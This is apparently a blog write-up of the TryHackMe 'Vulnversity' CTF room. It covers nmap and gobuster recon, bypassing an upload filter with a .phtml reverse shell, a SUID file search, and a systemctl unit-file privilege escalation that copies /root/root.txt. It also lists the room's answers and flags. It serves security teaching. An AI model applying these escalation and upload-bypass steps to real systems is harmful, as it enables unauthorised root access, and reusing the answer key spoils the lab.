Vulnversity is an easy and beginner friendly CTF at TryHackMe. Here’s my write-up on how I solved this room.
- Deploy the machine
- Reconnaissance
In any CTF challenge, it’s quite trivial to perform a basic recon using Nmap. Here’s how I did my Nmap scan.
Switches and it’s meanings :
- -sV : Used to determine the version of the services running
- -A : Aggressive scan which enables OS and version detection. It also executes in-build scripts for further enumeration.
- -Pn : Used to disable host discovery and just scan for open ports
- -v : Verbose output
Q1. Scan the box, how many ports are open?
Ans : 6
Q2. What version of the squid proxy is running on the machine?
Ans : 3.5.12
(Check Port 3128)
Q3. How many ports will nmap scan if the flag -p-400 was used?
Ans : 400
(Trivial)
Q4. Using the nmap flag -n what will it not resolve?
Ans : DNS
Q5. What is the most likely operating system this machine is running?
Ans : Ubuntu
(Check Port 22)
Q6. What port is the web server running on?
Ans : 3333
(Look for Host: VULNVERSITY in your Nmap scan result)
3. Locating directories using GoBuster:
My scan results,
Q1. What is the directory that has an upload form page?
Ans : internal/
4. Compromise the webserver
First proxy your connection using Burp, and visit IP:3333/internal where you’ll have the ability to upload a file.
Q1. Try upload a few file types to the server, what common extension seems to be blocked?
Ans : .php
Q2. Run this attack, what extension is allowed?
Ans : .phtml
After uploading the reverse shell and listening using netcat at the specified port,
Q3. What is the name of the user who manages the webserver?
Ans : bill
Q4. What is the user flag?
Ans : 8bd7992fbe8a6ad22a63361004cfcedb
5. Privilege Escalation
This part is the most interesting and challenging part in this entire room. I’ll try to brief this to the best possible.
Q1. On the system, search for all SUID files. What file stands out?
To find this, run “find / -user root -perm -4000 -exec ls -ldb {} \;”
Upon executing the above command, you’ll be able to see /bin/mount, /bin/ping … etc as SUID files, but however /bin/systemctl looks intimidating to check and that’s the answer for this question.
Ans : /bin/systemctl
Q2. Become root and get the last flag (/root/root.txt)
Now this is going to be quite a long run.
First, what is systemctl ?
The systemctl command is a utility which is responsible for examining and controlling the systemd system and service manager — www.liquidweb.com
Knowing that /bin/systemctl is a SUID file, the first place to check for a potential escalation is gtfobins. So I ended up visiting https://gtfobins.github.io/gtfobins/systemctl/
By default systemctl will search these files in /etc/system/systemd, but since we don’t have access to the paths that’s owned by root, we’ll try to create one.
This can be done by creating an environment variable, then create a service or unit file and assign this to the environment variable we created.
First, creating an environment variable,
The above command basically creates an environmental variabled called prvesc (you can give whatever name you want) and calls the mktemp command to create a temporary file as a systemd service unit file.
Next, we need to create a service which access the root.txt file and redirects it to tmp from where we can read.
The above command does the following :
- echo ‘[Service]
> ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
This is used to tell the service that when it starts, read the contents in root/root.txt and redirect the output to /tmp/output
- [Install]
> WantedBy=multi-user.target’ > $prvesc
This is used to set the run level and redirect it to the environment variable we created.
Now we need to link the environment variable to systemctl in such a way that it makes our unit file available for systemctl commands no matter on what path it is.
That can be done by executing,
Now once the symlink is created, we need to enable this service and the required output will be available at /tmp/output. That can be done by executing the below command.
Now we need to navigate to /tmp/output to retrieve the flag.
Ans : a58ff8579f0a9270368d33a9966c7fd5
Overall, this is everything I did.
Feel free to contact me at @thebinarybot in twitter if you feel there’s any correction(s) to be made in this article or for help to solve this room. Cheers :)
